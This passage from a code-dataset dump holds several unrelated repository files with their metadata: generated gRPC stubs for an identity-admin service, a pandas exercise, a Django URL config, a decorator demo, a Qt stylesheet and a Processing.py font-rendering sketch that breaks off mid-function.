request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.SerializeToString, ), 'MarkDefaultIdSchema': grpc.unary_unary_rpc_method_handler( servicer.MarkDefaultIdSchema, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.SerializeToString, ), 'DeleteIdSchema': grpc.unary_unary_rpc_method_handler( servicer.DeleteIdSchema, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.SerializeToString, ), 'CreateOAuth2Client': grpc.unary_unary_rpc_method_handler( servicer.CreateOAuth2Client, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.SerializeToString, ), 'GetOAuth2Clients': grpc.unary_unary_rpc_method_handler( servicer.GetOAuth2Clients, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.SerializeToString, ), 'UpdateOAuth2Client': grpc.unary_unary_rpc_method_handler( servicer.UpdateOAuth2Client, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.SerializeToString, ), 'DeleteOAuth2Client': grpc.unary_unary_rpc_method_handler( servicer.DeleteOAuth2Client, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.SerializeToString, ), 'GetEmailsSetup': grpc.unary_unary_rpc_method_handler( servicer.GetEmailsSetup, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.SerializeToString, ), 'UpdateEmailsSetup': grpc.unary_unary_rpc_method_handler( servicer.UpdateEmailsSetup, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.SerializeToString, ), 'GetUserBaseStatistics': grpc.unary_unary_rpc_method_handler( servicer.GetUserBaseStatistics, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'depot.devtools.auth.v0.identity.admin.Admin', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class Admin(object): """Missing associated documentation comment in .proto file.""" @staticmethod def CreateIdentity(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdentity', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetIdentity(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentity', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetIdentitiesByAttribute(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentitiesByAttribute', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetIdentities(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentities', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateIdentity(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdentity', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def DeleteIdentity(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdentity', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetAddresses(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetAddresses', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetAddress(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetAddress', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateAddress(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateAddress', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetTraits(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetTraits', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateTraits(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateTraits', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetCredentials(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetCredentials', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateCredential(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateCredential', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetIdentityLoginAttempts(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentityLoginAttempts', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def CreateConnection(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateConnection', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetConnections(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetConnections', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateConnection(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateConnection', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def DeleteConnection(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteConnection', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def CreateIdSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdSchema', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetIdSchemas(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchemas', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetIdSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchema', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetDefaultIdSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetDefaultIdSchema', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateIdSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdSchema', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def MarkDefaultIdSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/MarkDefaultIdSchema', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def DeleteIdSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdSchema', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def CreateOAuth2Client(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateOAuth2Client', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetOAuth2Clients(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetOAuth2Clients', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateOAuth2Client(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateOAuth2Client', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def DeleteOAuth2Client(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteOAuth2Client', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetEmailsSetup(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetEmailsSetup', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def UpdateEmailsSetup(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateEmailsSetup', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def GetUserBaseStatistics(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetUserBaseStatistics', devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.SerializeToString, devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
59.479817
164
0.725896
7eef7523932b29f9861b14ba707a8cb4e97912eb
442
py
Python
Modulo_5/semana_2/dataframe/iteracion/iteracion2.py
AutodidactaMx/cocid_python
11628f465ff362807a692c79ede26bf30dd8e26a
[ "MIT" ]
null
null
null
Modulo_5/semana_2/dataframe/iteracion/iteracion2.py
AutodidactaMx/cocid_python
11628f465ff362807a692c79ede26bf30dd8e26a
[ "MIT" ]
null
null
null
Modulo_5/semana_2/dataframe/iteracion/iteracion2.py
AutodidactaMx/cocid_python
11628f465ff362807a692c79ede26bf30dd8e26a
[ "MIT" ]
1
2022-03-04T00:57:18.000Z
2022-03-04T00:57:18.000Z
# importing pandas as pd import pandas as pd # Listas dict = {'nombre':["luis", "marcos", "marta", "pedro"], 'grado': ["LIC", "MTA", "DOC", "LIC"], 'puntaje':[90, 40, 80, 98]} # Creando un marco de datos a partir de un diccionario df = pd.DataFrame(dict) # creando una lista de columnas de marcos de datos columns = list(df) for i in columns: # imprimiendo el tercer elemento de la columna print (df[i][2])
24.555556
54
0.624434
206ca457a4dd0d48dbf0260038c61b742b39e238
639
py
Python
config/urls.py
rigelk/magiciendose
d2613f6a548dd620f101f6533bf7bea71a5ab3b0
[ "MIT" ]
2
2021-04-23T21:35:02.000Z
2021-04-24T15:17:16.000Z
config/urls.py
rigelk/magiciendose
d2613f6a548dd620f101f6533bf7bea71a5ab3b0
[ "MIT" ]
1
2021-04-24T17:20:33.000Z
2021-04-24T17:23:15.000Z
config/urls.py
rigelk/magiciendose
d2613f6a548dd620f101f6533bf7bea71a5ab3b0
[ "MIT" ]
1
2021-04-23T14:35:58.000Z
2021-04-23T14:35:58.000Z
from django.conf import settings from django.contrib import admin from django.urls import path, include from rest_framework.schemas import get_schema_view urlpatterns = [ path('admin/', admin.site.urls), path('accounts/', include('allauth.urls')), path('', include('pages.urls')), path('api/', include('api_urls')), path('openapi', get_schema_view( title="MagicienDose", description="API for MagicienDose", version="1.0.0" ), name='openapi-schema'), ] if settings.DEBUG: import debug_toolbar urlpatterns = [ path('__debug__/', include(debug_toolbar.urls)), ] + urlpatterns
27.782609
56
0.672926
fc7fc9a4cc19f323eb62cbd94f36a6b02b797f58
442
py
Python
Fun Excercise/decorator5.py
NirmalSilwal/Python-
6d23112db8366360f0b79bdbf21252575e8eab3e
[ "MIT" ]
32
2020-04-05T08:29:40.000Z
2022-01-08T03:10:00.000Z
Fun Excercise/decorator5.py
NirmalSilwal/Python-
6d23112db8366360f0b79bdbf21252575e8eab3e
[ "MIT" ]
3
2021-06-02T04:09:11.000Z
2022-03-02T14:55:03.000Z
Fun Excercise/decorator5.py
NirmalSilwal/Python-
6d23112db8366360f0b79bdbf21252575e8eab3e
[ "MIT" ]
3
2020-07-13T05:44:04.000Z
2021-03-03T07:07:58.000Z
def decorator_func(say_hello_func): def wrapper_func(hello_var, world_var): hello = "Hello, " world = "World" if not hello_var: hello_var = hello if not world_var: world_var = world return say_hello_func(hello_var, world_var) return wrapper_func @decorator_func def say_hello(hello_var, world_var): print(hello_var + " " + world_var) say_hello("Hello", "")
18.416667
51
0.626697
e3526c5e2d24166b71b1bfbdd443659a10f1061d
26
py
Python
python/test.py
chaleaoch/code
eba44be0b3d9a31434f32d0fd38332bf75a93130
[ "MIT" ]
null
null
null
python/test.py
chaleaoch/code
eba44be0b3d9a31434f32d0fd38332bf75a93130
[ "MIT" ]
null
null
null
python/test.py
chaleaoch/code
eba44be0b3d9a31434f32d0fd38332bf75a93130
[ "MIT" ]
null
null
null
import json import django
8.666667
13
0.846154
698765451946f2f554a12a324a494b51a576394d
127
py
Python
src/main/python/app/style.py
kevinyu/soundsep
58f8100e101a6302533626d2f141c86748c8dc10
[ "MIT" ]
1
2020-10-03T18:35:52.000Z
2020-10-03T18:35:52.000Z
src/main/python/app/style.py
theunissenlab/soundsep
58f8100e101a6302533626d2f141c86748c8dc10
[ "MIT" ]
null
null
null
src/main/python/app/style.py
theunissenlab/soundsep
58f8100e101a6302533626d2f141c86748c8dc10
[ "MIT" ]
1
2020-08-12T17:16:15.000Z
2020-08-12T17:16:15.000Z
qss = """ #Window{ background-color: white } QPushButton[flat="true"]{ background-color: black; border: 0px; } """
12.7
28
0.606299
385e2d026e5155bee5296a2c879aba6bcf7f2d01
3,849
pyde
Python
font_fingerprints_square/font_fingerprints_square.pyde
cclauss/generative_art
fc179177badd8b54b4faefd6f36f3d974ff0ca65
[ "MIT" ]
11
2019-06-05T04:37:38.000Z
2021-08-30T13:40:47.000Z
font_fingerprints_square/font_fingerprints_square.pyde
cclauss/generative_art
fc179177badd8b54b4faefd6f36f3d974ff0ca65
[ "MIT" ]
null
null
null
font_fingerprints_square/font_fingerprints_square.pyde
cclauss/generative_art
fc179177badd8b54b4faefd6f36f3d974ff0ca65
[ "MIT" ]
1
2020-05-07T13:16:43.000Z
2020-05-07T13:16:43.000Z
################################################################################ # Aaron Penne # 2018-08-28 # https://github.com/aaronpenne ################################################################################ import datetime import string import sys # Define globals here rand_seed = 1138 frame_rate = 1 w = 2000 # width h = 2000 # height count = 0 timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S') def setup(): # Sets size of canvas in pixels (must be first line) size(w, h) # (width, height) # Sets resolution dynamically (affects resolution of saved image) pixelDensity(displayDensity()) # 1 for low, 2 for high # Sets color space to Hue Saturation Brightness with max values of HSB respectively colorMode(HSB, 360, 100, 100, 100) # Set the number of frames per second to display frameRate(frame_rate) # Stops draw() from running in an infinite loop (should be last line) randomSeed(rand_seed) noLoop() def draw(): global count if count > 5000: sys.exit(0) count += 1 # Read font list try: with open('font_list_mac.txt', 'r') as f: font_list = f.read().splitlines() except: print('Using all fonts') font_list = PFont.list() font_list = ['Webdings'] # filter_list = ['Bold', 'Italic', 'Heavy', 'Black', 'Light'] # font_list_text = [x for x in PFont.list() if ~any(f in x for f in filter_list)] # # Get the fonts in a text file # with open('font_list_mac.txt', 'w+') as f: # for font in font_list_text: # f.write('{}\n'.format(font)) text_size = 600 for font in font_list: # Background color # hue_val = random_centered(26.7, 5) # sat_val = random_centered(3.7, 3) # bri_val = random_centered(95.3, 3) background(26.7, 3.7, 95.3) #f3eeea # Initialize font text_font = createFont(font, text_size) textFont(text_font) # Text properties fill(0, 0, 4, 7) #3f3f3f #fill(168, 31.7, 74.1, 4) #81bdb1 stroke(0, 0, 0) textAlign(CENTER, CENTER) textSize(text_size) # Print each string at different locations offset = h/3 h_pad = -h*0.04 print_string_stack(string.punctuation, w/3, h/3+h_pad) print_string_stack(string.ascii_lowercase, 2*w/3, h/3+h_pad) full_string = string.ascii_lowercase + string.ascii_uppercase + string.digits print_string_stack(full_string, w/3, 2*h/3+h_pad) print_string_stack(string.ascii_uppercase, 2*w/3, 2*h/3+h_pad) # Prints the name of the font text_font = createFont('LucidaSans-Typewriter', text_size) textFont(text_font) fill(0, 0, 0, 30) textAlign(CENTER, BOTTOM) textSize(35) text(font, w/2, 5.6*offset) font_name = font.replace('\\', '') font_name = font.replace('/', '') output_filename = os.path.join('output', '{}_{}.png'.format(timestamp, font_name)) saveFrame(output_filename) print(output_filename) def random_list_value(val_list): index = int(random(0, len(val_list))) value = val_list[index] return value def random_centered(value_og, offset=5): value = random(value_og-offset, value_og+offset) return value def print_string_stack(string_stack='TESt', w_offset=100, h_offset=100): for c in string_stack: 